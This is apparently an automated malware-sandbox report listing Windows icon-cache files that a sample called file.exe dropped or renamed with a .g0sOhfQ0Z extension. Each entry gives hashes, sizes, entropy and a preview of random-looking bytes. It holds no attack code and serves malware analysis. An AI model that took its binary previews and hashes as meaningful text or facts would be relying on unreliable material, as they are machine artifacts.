                Preview:.......*..;ym......R.Q*kenI.X# ......6.Yf... ...U...wPo...E.Y....\,.Q.u..#p.....l.n!g9.t0.I...7..3...Z..zTF.o..L827._HX6Y.B..#s..g.j.5..`T!..n..p......J9.t.....9...3$.........:...F..U).6w...$...:...B..9.j.br.0>{".ioN...F....w.@D.-qd#;n-..<;a.M.Bbs...km...{_...vh>...{u4.....n..tj.x0s....8..1?.V.=."....o`]'..m8....M.&r..A...4^.:.o...w-...W..BL.01.e.4.B.z....u..VB..r+.m..J7........eT|`...2%.m...T.u.=....).G...+..V&6....3w......./....:y..Jt..a[ .z>iP ..U>H.8].c.{...+..n.5....(.l.o...j. ....^E.l..@q;..=.<!0C#....9.s..0|.X~c.?..S.Y..n.?1...{.r.....L......WB.(.......]2..n~...i.P*....whv|6.T.C..!\.=L.R=..~,......?`...g..Q.#u+0...w..1.^.;!U.1O..Uk.z...0..t1y2W~.l.._......j;=....3.....2X..U.A...I9......[.h.z..S..p.aX....7.[9kRmLGO.....".......u\f.Z.[..l..O~...v.O.H"X._..o%....+(,-......7....+..*.."j.g..`...7....J4..x.{.3.q.Z@.R.\.I;M..!.V'...CY.....k.H.T..Z8.L`Vc.F.!.&\.(1...kP..@.~.+V@.DP0$=......2b....9..}S..r(&..*..E.$6.(.Y."......{.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_PowerShell_ISE_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4560
                Entropy (8bit):7.956073006949162
                Encrypted:false
                SSDEEP:96:kC+8fkKDZhYIMIFJxfh79lVzL1IwBHyu5rJbCSKJ//w/7F2GHezR:q8fkKBZrFLRfrJbiJ/0o
                MD5:DA2C1AD995BAA0D44F178C5535075A2D
                SHA1:52386E68D65909DA91A010179E7B6476CB8A0F2B
                SHA-256:8D6E7CB1416D3ABC16979A6059B13B0715DA30B39DB4955EACE50866731F2BFF
                SHA-512:FF55A30C11E7BD25F84AA1A697DBE1F81E5BCD7FA2296F52C5E7508B0026B088FF2D5AFA9D9C88B693B87231462CD0E5EB59FE13AAF05E59CAC8640E2A7F3DC0
                Malicious:false
                Preview:y...e.5.+.N&.:.0.../:B..7m.. A.D)..<...0..^m.u..I...<..y]c....s.a...t.BZ..4..9.q....J..X...L....Z+..uX...V.....w.....;&=e..u.._...*L...$Z..../2....QlQ.c.`..x,..8N.TW..Z..}.....]A^.m[..>.B...?.A........8v...o.u};0....e.B..KH......).w{p.4..!.....*G...P!.@Z........._M.;..!b.m.'.H.)F...""<.a..,...33.nm.#.F.@#..p.`2Z..T..|7.v.P..iXkN..o.......5.5...7...$8).%1..f...A....).=H...@M...2cw.0.S....-i..7......40y.F.4m[U..8..n.].W.....E./..FUv..@T..Z^(...k..Po..<.S.O=.x....9y......i.........6?...|..b.........if2....%.}....x,...3...07.o.E..#...s......&..{.Z5G..We.f..>..%nI.W..)............R....f..dR.......-..N(;...}.T.}.k.K7ua;C.....5."..p.d...x.{f.}:.s.Y......'..Bm.w.f:.-S..s.Gn..Q.E....0......x..*..0..{.d=.8}.....g..Q.,.<U... p`h;..6G.k.....h..m.. ....P..fM...e./j..6L..)_B.....1.U!..".Yz.$Q..%...a%....}f........=...../.].$..y[.....n...d...U.d..!...*[bM..N,1....E.xH..H.4..Q.u3.......T..{....u#@8K..~Rd.1.....>...&^.JTh.+<O...'...Y..+-..k.......J.........

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4559
                Entropy (8bit):7.9607952325329325
                Encrypted:false
                SSDEEP:96:UgSoJ0XmYlo0of9HJMktr/oqLK3mybKyBPkGapYoND/CTQA0yscMUCItO2GHezR:UyqXmYulvMkpoqmKuct5/EnoU8o
                MD5:ABA0F87B9674DC0D4B66C1CB0985D892
                SHA1:F52DF58FFE908BC31BFE458A9B2FCCCC15F10520
                SHA-256:68277E1B0956AE0B688D24B5E9DC6FFB62695D74FE4ADFE81C7D2A642559E652
                SHA-512:15F80091FE33EC60B640F5DF4181E51E706A670F6D85E5E27D47E41F941E56BBA17C9F252DD575C5955926251D4A418338BB6AFC0ACFF9BC61514783DC722337
                Malicious:false
                Preview:M...^7S...6v. ...{.4o.4...|.2Q........0..~q........*.\.a.^...1i..J..?.Q.f.`&a;K...}j.M.S0\v\.....4.+."(...k......0fpkK<6.t.oDs.;..i.C.]xV....I..x..d=....Tn.\N.....8..~.d.k@.....k..0.P....k..{&.3.9c."B...Wf.&....F......i/C9...,{.$^.q/......5....v#.:..=..].v...G..a.HzS1%..L.........'.%,..r.W.4...d.'.k.....n.>a..).py......7=..z....f8.J....*..u...{-..\.t....j....3.by..|..|+...@O.D....#..VU.!~Q..y...CMz.....".Y....9..|l..v......PBL...).^.r.(.-.c.0.aa...x"+^..R...R...T.....__L+..$.>..4........Q..p...p....U.Hr.....1...,..van]e.xO...r.4..2.2A.W.a.X0..tn........}I..2S..qw....d$............A!...<.9.K....N....v...K*.....nA.[....3;........0\$x...8.g..G.q&.@......;.............7...F..11.<.AV.._4>j.9.A....U.......@..qG.`...>L.&J..m.@.$.^...>sXu.F-^64]..W.O...=.O..B...%N..+..Y"T../.6...Z..'JR,..P.#E..k%.Lt.6..|.UpX2wmP.5..Z;..,h,.?.>.....,^s$\.......0_.........i.....~.`..H...+..%.m3EG.:-...\%e.7...3..]...<..a..c.[.d.(tN...O....5....Kc....?s...fV.WV..i.J.+

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4532
                Entropy (8bit):7.958553658822883
                Encrypted:false
                SSDEEP:96:v685boyYdHWiCsmFWUgS9Yax31anr+M+JGijhBq6Tpem+MkyFRT9DgrXM2GHezR:iiMDvvmFWpJa21+B3B1FkAh9Ur8o
                MD5:E9B75ABE6AB35D4A97FEA80D2D3D9195
                SHA1:90BE16AEFF33B9E6D07DACF4987DBFBD7A8A6BCB
                SHA-256:2591A374541D0FA4907D23E1EF9D1073A87D5E2167B76F620C4AFCD4237FC14E
                SHA-512:FCA6479571968FE92D88B44AB9E503D0DD64FE88003AC000CF376212185BA779475DE2791DA92197DE6E4C828C88D603AB55D07FF2FE0C18E272D786565940E3
                Malicious:false
                Preview:...R[....O....`...7w..h.JA..P.HB.S........@..IG...j.h.....h..4w.....ps:K..^.....Z.J.*U%..k...R.@....V.#...j..ka...98.....y0.[......)..c..;....o#..UP.K..1....n.$/b.EjZ..u..+S.y=>.0c.c.[.'0U.6......D.f.=.PA...Z..H..5....N.....K...,?r.....%.J....-..M...Z.cf...o.......M.lZ(...`......0%...wI>.j......F...TL.`.Yqq..Q.EG<.....Za.._-........).......J....y......_.....J.:.!..Es....VE..L..[..ah8..T..A...%.....L.t.8.a1..9.`....=.?{.W.......@;.%....u....=b......f...y.c.}c...E6.....D...wz>..d..P8.4.N_..K?.w....(....j...;.#..z..Pj..y..h2....d...9....Z....$5/.M..&./ry.-5.A-.Z..!.,v.v.=.w...mLk.w.et1.P,.<...=.K..&.<....G7.^....n...,gI....e.J..i...;......$.... /(..v..rFD-....6LBO."....6...=.......<.M.. 2o.7.H%.R.6.Lr:M.......[.,KiGq..c!......mr.*[H...).......Wj6J1w..=...........e...k.WQD.p9..9TH.dM.$O...8.5.....wc.....:...,loZ{....s.....:.|....I..'..5.....h.w....1...w.......6..O...D.......E[..5Q>.....\.u.\.,w..W.(A.~x#EG...d.Q>D4vEx.....8...jO.Q:C

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4535
                Entropy (8bit):7.959904739699236
                Encrypted:false
                SSDEEP:96:cbblhxkOUJQCr7CO5lhgV9KvqNA3n7GvDvyyGv2GHezR:KrzQTIV9KvWv7FGo
                MD5:E7F81EE70E787FD3C072EBF7F1BBE370
                SHA1:D7AE856F123190A3ECF0EA6690EE8C6EBAA01FB4
                SHA-256:9674A21A0969E32C2CAF837036D2817EA7CA1ACEEE3BB7D18203C415E16A3BAC
                SHA-512:8210D6763637E18F376CE99859466FC5E3268359A7691CDE01E0352EDD7BA4CDF1E01BB987D574989A490E6C7614CF29D738A5FB2D3F5042B6688C38A1333AB9
                Malicious:false
                Preview:.r.GS......B.S..L6._..&..y.?".,.......b...WPJ... :.Z........y..!..a..k.D...'vg.?..JoI.H..-...{u.....H.....X.M.-.Q...2O.._`Y.?. }.}...F>X...\.^N.....h9.>.!.U...........V.....Fo..j.4...TiK|...F-...D+.....#..#.....,..O.e...f8....d......& .ji(G. nc."x...[..A..!Rm......8.Yt2.G.[|.m.\..^>$.Q.>....A....4{jF..F..!..A..t(....a.W/jA.~.^T.dON.G.....i+*...[.TiH..ni.E.s(..P.....I.E...........<3]F...:>:..O,.8.I......\,Z|K..H...m1........F....5;....$..F~<.....\M....T..7..{.-o|.t....Ab..?..5.1...M...<...Y.#i.*...vW@...}.k...F...<...i.....2m...*..tB:.^..c/.&.."...,...<.MBm#....q..G.?.].{...o./.G..U+...(...a.. |.-w.Z.`....E_G.]d.ah.'W4.....y..J*.o.*..NE'.X.F..@."...<. .d...)....@...7.)U...X...4./........*U..?.-..q^....g.\.._.....Ig...Q...{u7[lh.F..".....Ku./Q....MN&....!..4T.*AjP.....!..0...L.r`..|P..[..Hr.-@~7../...2..gy....6..bo..6.cL... .7...t........;.+..P.....ht#XVx...f...DOJ.)./(.R|{w....].St..I.P..............Iqfb%..}}.a..%..2..=."54wD.5.g.M.r..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cmd_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4526
                Entropy (8bit):7.9589484212199
                Encrypted:false
                SSDEEP:96:EfqqpGA0zFRL7o8YPIs3nY+9CCEuJ6ITptDm54CawDa2GHezR:IqOAv7oPQE9CHXCtin1Dao
                MD5:54897B474BF7B940C7C0207362D7DCE8
                SHA1:CB08EC853D7D4BF568BD259E8B005290472AC7BA
                SHA-256:BF219190C251A1124009F6D72E677F6929401ADFC2041ED20AE38569266A2B71
                SHA-512:FEB6AF55C9705137680E9A3C7D898C67EB5A76828B52CE2F6E8C1B9361A3FF66ABCB8AF53E06EB7F787D7794BE1FD2A40D4CDE0DF809CCADBE899CC9BA7ABAB9
                Malicious:false
                Preview:...etI...|WD.!f.....d...............K....r..._2...%c.'v.....1;L.D..x.4!......a. .Um+..@.x...a.I......CV.t'.o.....Xs...{..5.O.J.7....pD..0..*..&f..uZ.......?.F!rk..N.u.(Ld..r.E...f..T...|@..QJ.......H.........-8.........."....~..F.]...l~..1d.(..].G.~..{s.....t......K.0.>Hx..X.:..f.$...q...fxt........8...N...8...q.....Cg...&.Qv.1..<.m.#...)j.9Y}....a.T..1.....`l.Q0...*...`......~|c....NEw.......F.*4.l.R...T^......@...a............7.d.U.3.5zj .r..A>...?./o......vD.2.....z...{.'~.,....ch.b.?. .b..Q.....|............(.s..(.>f9.3.]7@.ZgX......E8?...mh...v.....N..^h$F.@..x.{M..(kdd.E....?c....Sqi12...._.nol.P.2...2.<s2<$f.'.3.v......-...o.7~'<.j(...Ti.:..O....C8...Fh..'.../`.......#}.K..=..._[...|ig.X.4..8N..... .y..p...#;&..F.......n...<..&..m....F.6..(D.3.ZB.:....& ...v....).4[ak.Av...wg....&2.....s.`l.\...^..._..b.......1..S.R...O./.`..]..-R.[c3].Q\.v.:/...y..xN;...+7..P..K.......:.H..+...FC.......b9.Uo.;..%..T.kN.h#}...x.%.k.k.8f..jQ0

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_comexp_msc.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4531
                Entropy (8bit):7.962178789144833
                Encrypted:false
                SSDEEP:96:W8DYDM3e1tTFEnJ3NATmlqY+oQRbaS0cHK5Q4Tc3T4DA2GHezR:6DMufFEnJ9ATmj+PuQKc38Ao
                MD5:0F5F47EC302870BEEE9A27F22F4ABCD1
                SHA1:D77803CFC12791F5D178A64F5D1553D3E41B13DA
                SHA-256:FE292334B526B64DC62FA08B64FB295E61B8A88AACDBE8D8E24B21749EBBC743
                SHA-512:A79172275AD56F6F7B8826A799A642762AE833CF5897571147791DCFB0FAB30A664C54DA53730FBFC4D837A5DE8384B85425818201830F6154DF15DFBDC552BF
                Malicious:false
                Preview:.k..."z.^..?...v..q ....fF..=.v0..;...$......P.#...5[7..w.....).o...[W!.....?.a........N..N.!......B..au.p.G.g..`...X.S..8...2X4...E:.1X;.o.-....N..Q.-?.h..6.!...-..\2..m..y..w...g..&}...."-.......g..u.i..;[X..H.}.....D.x..IW...o..}....P.y.gu.M....ZTz...^K.J|.|...m.!k.|.|..s..|.:."x..Z...R.e.YS....J.Q5.......9.o.Bks=.;.....*c!2w...G-%.a..'9...z.B.B..N.....t#..?.....{5..i.....#$^C...%..z....W/K.z.g[e...22...g.......Z^.-......_..B.....?.J]@.c.z.|bCG....I......q....$.!h.i......zH.d..s...$.....Ue.H...?.W.....S!.U8.nU.i......D...6.Uw.~sH..b.:%IV...z.Sr_g......m\[uv...4d$....(..CY..^.Y..a... .K;#.GK..O[.cNp.f[...zI@Y.M..4.A....<..&N.@..<s_.?..M.P.v...y. .e...].3..k...L...M.W.....f.Dod>..=.ld....X.jl.. .+7.Nw.U....9..*&T..d.]....k...8.nM...i...%......:.K....M....,c.(~.......[E.M...R.4.+..).E....).".;...=..".1%......4.?$....(....OPPs..."....Ub~.~n...F%Fz3Z.d.y....L.....'.,....&..Ycw.: g7...$.Bs..q`.k..^.?.~. ...Sn..."k...!.t.66%..<_[lm.c...e.,....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_dfrgui_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4532
                Entropy (8bit):7.958427774954701
                Encrypted:false
                SSDEEP:96:wtRzsg9t1+WbnFp3yKqIQpdpGlamrPW0f+OUZno23JOAMeO2GHezR:Cbt1+WbnD/qIQGPO0iho0wo
                MD5:EB8433515AA61715D1D29340225FE648
                SHA1:C6D5597134D963A70B20739C7ACA53C141DD9458
                SHA-256:0EA7A1EABFEE77DBC6FA780DA3ABB43B246DDB73E052EF72EF57EC62B9FCE655
                SHA-512:C2168F540C0388E65EB4CB08615CFC486389BEE975735D5E5DAED8B11D29CEB774EE4EC5E2F61F5D61815CF999E0812FA699D2E0CCF5E0C047C8D9319308CC03
                Malicious:false
                Preview:#3.........*...S.L..l.0....`+`34.D.H...(.........h..i..q.K.....=`.....g.;.(L..:..R.Rz..oH.9....Q.....%.y?G/...5!cI....r.n!.a.48`.c......W....a..E..s...I..>~.z.[r.w....N#?T...4...}D`}......i..'..*..!...O...R..............?......4K$~..q.m........F4...&..bWIf...F<.^p.......HO...#..$^....v.....l.oZ.,AP......}....\r.H.".P.8P.p..O}..D.x....0Q9y..T1....%...>..P_.......|Z..0.n*=*zE..5.........K....1..xd..7G..l.;.S....5....c..1A.D.....+....8....1m..f...?..=.df..F!46;.|.NS.M.~4...e...~3..&....o...........|r!....t.{.....7.A..5;..@....9...@.y.t.0.J..)M..sD.{.Xb...]Hp....L..x.S...*.^g.k.R.Q{..HSZ...*.3...s....A.|.N.5,.".+.?.k?b{.....4HcO\.i...Tc(...:%{.8.a..z..-7w....B.n......q!P.....<l-.U.i.fT5.5..N......|...z.P|EM..{....8=.2(G.E...V.t\G.ycW.^....1...&[... C...b.....96.....IC....zU_....h..yj.Qe.... ..~..6...^..&..R..[..{..N.&Z.y.y..o...PD\Np6u......8..E.@....0..*.MGG0..\.$.o...nD3...~.;....0..7......O...%.j|g.. .:+.Y.{....:.y..7!y.gY.*..n.....\.t...R.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_iscsicpl_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4533
                Entropy (8bit):7.955532980590478
                Encrypted:false
                SSDEEP:96:btWbs0GNi2xkYQUVeebPt++ndGyNlSCiCTzZt2GHezR:BWg3NWFWt+4Nlbxro
                MD5:7B7129E0B08CC7545D9BCCF1CDEF0A85
                SHA1:BFCE45A3981A9219A77F74BE1F457A673C0207D3
                SHA-256:44E5D662056243BEFD096BD7E075F13DF0F8998C8B2311E45B775AA24F52D698
                SHA-512:2071653E9FC981DFAC3DE9FFEB86EA87A9C199AC8B7A021DDC231543EAC8C275DBA35FD55AD53118690DFF70AA4C645DE8871B885E880F7A6DF3B2406AF3890C
                Malicious:false
                Preview:O.....V.H.:O..=.....[..9.,..l.Qj.X9..*....$@".....r......74../.V.......2.0..Yu.~.Jh.._...LI.5a.ud2)o`...1...f^..).8...W......E.N.....''@....#.o9.....R..nR].a.n..,.y......>X.JU.}I...i...+.z.W....R._.NO{.....&.=O$.%u......3..|..9t..Md...G.0....|....@.>......Y...u....}..&...[Z.....*..O.P...-x....E.=ND/..4k..'.....}.&[1....(.|..Q..Oa..Ks....l.Se.W(.D$y.....}!..UP..D._o....P_.d.+..N.U'J.............a..2*#....%....<.E.[...d.X...r..R.z..U....R. .... kiF......\.|...].H.-~F..$y..b.4......j...z.fU..<<&tr.a.6.C..P.....V.0.&.@.....).>..d.....N...`...|Z...(.8...?.X.y7$4...-...1`..c.d...G....WfJ1..gp..H.$.M.e].m.3.+....'.y.=s.....`......%...[6...a..0...g8.r..qW.......xIV...'..dR.9P..UcNH#Sw\...8p..=a.1,.I.N.S[.l.Zal/.+....w$.K.:`(E.."......;M.f..=..s....t..{......X=e.._5...t.H..s..O.].:...w............+. J..xY2.VM.$.R..:\.T....A...;$^f.I......x.b.s...P.,^.M~...N{Q._...._..b9..#6?......4..........7O...S..:.......1G.6+.=.)*.....<....].....-&..ie.m...+.G.D...%

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_magnify_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4534
                Entropy (8bit):7.964659712595017
                Encrypted:false
                SSDEEP:96:UTwEKbocATuK2h4d5kE6W9cI+uJs9SLCi2eK5HX3H5rS4VYuN2GHezR:0cATub4U/qB1i98NKxnH5zNo
                MD5:5B88B7E7845D3F3B5ACA7B361F0118B1
                SHA1:EED0A624017EF6A3C7A948D1474404C31AB5C222
                SHA-256:59FDD79E5319751D3132DCF39787A8166948B537D77E972FD394E205EC118F65
                SHA-512:96C7CA6E43209D020EEAAE64BF7BDD0A81E603047548E656163178DBD6CCD221023757EB360ABE05749455550333DB42DFC64A3C5D72CE8D834B19117B863C59
                Malicious:false
                Preview:s.oY..5V...SS.......,R0..v...z.*....s.>..g.....VSzz^....A...)p..7..$.X.a.......P..Acu.@....S...]..."...cw.%....o2..N...,........Nk.>....E.......e........&.z...:.O....2...n..5..f.."..8+........b.......D..t........5....kf......B.c...$T..B.3./T.&r..T.'9!.....-..q..:....`.^...D.f..Q.8y....~ Y..g......#~C.U..>...o4.g..0.@GQ....5..$./....%:.,9.|r.DUK...=.}2.....9q..+n"^a.6.5....$.n].._....6.?.z..9....m..GZ....k8~./.Q.8.......b....Q.....:.q..!...^".z.E.&..`M.'!.Uo9./.b.L>F7>J..s."w..L.....h..H|6..>..K..=;.....'K.N.lK*..~~..*9A>..........Jd4.=.V.Fg^...VW.(.......HwjGY....K.Mm.%lc.. h1.&..c.y._7...*....y..d`C...."...f..kw.?.rF..V~Z./u\>>S..|....i.\.....rd.......h.....E7.fm.U-.~,.Rx"..h.....e..D.7M.@u..!....c(.../j.l.rd....p.\...(.^3.n+."...b.Y.........{...a.x..65......,_dK...d..J..E.l.....bB..Gcy...&.4#.e....').`".c.......X~x$...y...$..........b.........J......>.,....$pz.T..,.`O....2...%.#1..4....X.4..vG.W(..w..T.|@..........?.&m.Hd..Sl

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msconfig_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4536
                Entropy (8bit):7.9551623896306
                Encrypted:false
                SSDEEP:96:Lb/ubk1liBA+xrNmvcwWXBAV0NP9rLIwifief75rYU5OZ8t812GHezR:LybK8BA+xr4cwWRA+P9rfxKK1o
                MD5:D1F198F94A0CD9582E03B0A82AF835CD
                SHA1:B4CEC051A1C70ABE44D66CECA572E73B827ED40E
                SHA-256:086733AD59ADE70EA24810B8B3456820D24BA8418389C4953287EA4A8407F410
                SHA-512:387AB0C5363DCF772B1C2BEB640C0F96C36A9B12FC45020186378D6CC927E4EBA3797EC1902AC7E872ACFD95E782E0DF752B80216FEA52A40AAEC254198F987C
                Malicious:false
                Preview:.0M2......o.ul.......0... .z.e.*....o...h:.....Fz..% .V..b..s.......3.O. cvv0.).E.]q.=.n..+A...B...(....[....m.E......:G..`.....e......2.ww.w.DY..H..oB..7."07.~.."......~.S.....<.......".......3.Lq....X..t.1...C.5<...=J.Q)z...r.P|M........Z..{`X.G{..."....%Z&?.]...%.$AW.$.....n.nx..M4.......9F......}Kmk.{..m.3(`4..w....^\/....s..w....I_..O_....J)..2..y.....k.Nk|.d.vcv.U..........=1...E..H.. a....+..p.*"..n..2...;[."....[.R.j.....p.....%..X..e...6..r..U..^.....*...u..r..RGm...@.}..r...;pT.....hJa.-.+..*._....w.....i...<l.....R......7~.3.F..So....'...b._.I....1.N.....=1{..n...............;....t.UO.E...&..i....:...m...Z...V~q..X+....0#o.D...oQP......hF.r.^.[...+)...~U!..`..r<.|.L.&E).=....7..k2-...8.=u..^=.......p......E.1..qv....P.h...o...F....s-....D..............L..;X'..WS7.Nw.....1\.|..|..v{..#..9.$;.D...b,u...n.[.....`..]....._.......4\.$...1.`..nu..%w..Jv..<..S..[.C.......?_../..i....X\...G...+.....g...%.V..bKH...rH>n-...<..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msinfo32_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4535
                Entropy (8bit):7.955267136202073
                Encrypted:false
                SSDEEP:96:PhNmEXK7WygP7wOx+Z7ulVnwBXyCE0raDQHMffUrcVsGJ2GHezR:PCEXoWyw5x+hulVnwd1Mf8Yy0o
                MD5:E9E33C2170C00A5EFE2ACD83DD1273A0
                SHA1:E7F41A62F1C67F6E2B9E4706E5F4167F48ECE852
                SHA-256:FB5A3F2F561E641E49623116ED2675065B95AFD48FE9BD5D5314761050E81C8E
                SHA-512:A4840D7ABEB6F711BA2CFFB1BF231B622F076EABADD4321F4140665F2D387D84873BFD55B72198C0A9BFC42E898E2055D1CB1B68E17D7F8CB10797E7F384A727
                Malicious:false
                Preview:.-.d:.?.r.....y]8.D....K..=..Y.?>.....l..[.n.H.yf.U>.A.....\...xG;\....u...>'G.1H.g.].|..Z.S...s2.@......".......m....B......d-G<).&.....IQ......! .T.A.rT....}.....X.9.].m.Mub...>.c...L.{/...5.-s.KG.h..r.....!.P...p.o;.P.:^j@.iP.....Z.m.)b..0.2....e...2x...O..M..x....&.P&...e..Eln....z!. .h2.x...{;.+...*q.....R ..jH.'..V.5.....~...'.0m7W.....n.(W..4.....0w...;.X...=.........O...*................(b.k.v.{.I.VD.9.t..F.:Kq.v....;t.{|r.Uy.uM.$*....U>.I..$6.........T.5.$...r.8...jP.qN....K...X.[....>:u.F...o.....X...q0.5..0.S.....z.).n7.S.U....$I.c..~x..T..XYw.(,U...S......A1o..Iu..e..fz...;.$...V.!.....iG.'.{...6.?'.G......#....1...}z..oS.n.!..O.U2cy.....).yGv......p...7i....,...CK./.....+`...'I..-...~...;p.<.t..%..l...S..I.\...Jj..2.F...a...I..\......X..#7..hZi.e..}...,......-.U..5..p.....Ki..nEz.R.=..%.....T...M..H..1.{.MO......B..4.X-.u ..%..!.=.J..#..<@..F&......{.b..>W...n`...i.e.Q...m<.{.Xq[....;..B}...A2.1...A,...I.D_EO...^4..D/=.).....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_mspaint_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4534
                Entropy (8bit):7.961314128155207
                Encrypted:false
                SSDEEP:96:9UGZfSNm9fn5QVKS2LXY9t6iKllVHfW82EW+xEZV915TV2GHezR:9nfX9f5Q/Ooihu8TWIEZVH55o
                MD5:2F0B2279064E0E9C755D2728C6CED449
                SHA1:704C1C15D54D024D7DEA9433E9255D38E5A5BC13
                SHA-256:3227075D421988A8B0D7214D2086FAEBEF7CB9BF7B93DF807A73ECC7F055817B
                SHA-512:66AAB1B5665622EB0EEE0E4B1C0F8AA2688D2EF617A2340C416B57ADEA97486E12BE1137D25F3E5E183EB6819EE14B75B3EE47C4AAE6955C84F279CA4F253552
                Malicious:false
                Preview:$I.!=..w.#....cmP..7....DF.X..=w...7..{.=..U.m.tfz[.G.; ytt.d...*.?p..Q..(/..!..RY].....p.}%.G........d#*<{fQkG..)..4..%...Qn$}.....um]....B.....s...iX...vJ7....P..f.<.U..W..D?.i{...q8...qL.lI.........A..ND(4).^.@.O..Zfhz.J.F.=]k.K.K2w.X.}...+.!.1.H..F.T.R...-r......:..U....:lrsp....#.?....<..............a.cRA..xl......&]..{.............c......>.3:)J..&."...........rJ..{xJ{N..7...t~P0......../W....9...e...n.A...:.r.7z.KGg.s.........E._.qn.j.#^.o....&...<..GK.4L..?m4....>......[(...f...)..JB...4.........+.{.z`.$.<H.x.Do........f..J."....2.......?.....Z.fo~.!wH."I.]f......B.e...]....#.R..8:.UF...p..nf.m=3.Ut......:v*..D7.H...&.....z#..?7.EJ.qP..._.DCL.......~._E....I.. .~.y._)f...oF)K..]...\...L-z....hX....9.z......i ].=4M.w..0..m..n.{...+..A.i.._.[.8....K...;N.oh.;W.doP..;..l..z....3......L'..6..Q.HV{.@..e.Q."w2..nu..{..n`...v....8..B.L5;.M..GB..tCM..u...d....a8f.\.n..?U....n.)........]....M....3.u..~#..u.;.?..S_.Nqb..bi8N.c.=......

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_narrator_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4533
                Entropy (8bit):7.965854793013206
                Encrypted:false
                SSDEEP:96:ZhOKkauambaZuDRoBrx7yzFjIH7M+G/txLnLz6A6Vx2GHezR:v+RambaZRBrx76jIbPabX6A6Lo
                MD5:D714A4F11E321A6748FC53D681B19F62
                SHA1:396ED9279F50F857BBEC4EFECF6767BB8414491A
                SHA-256:88079F2F1786528159EEE797E8F44B6320E3A4716347D90840E1161365C2803F
                SHA-512:9B6E53746529EBC2A2874753FCDA02DBFEC4C90FB363E6AE95EF832DECBB8888F346FF5650E9D72A371E12C71BBD46C79151948EFC1683D74FB43BB6EA62199D
                Malicious:false
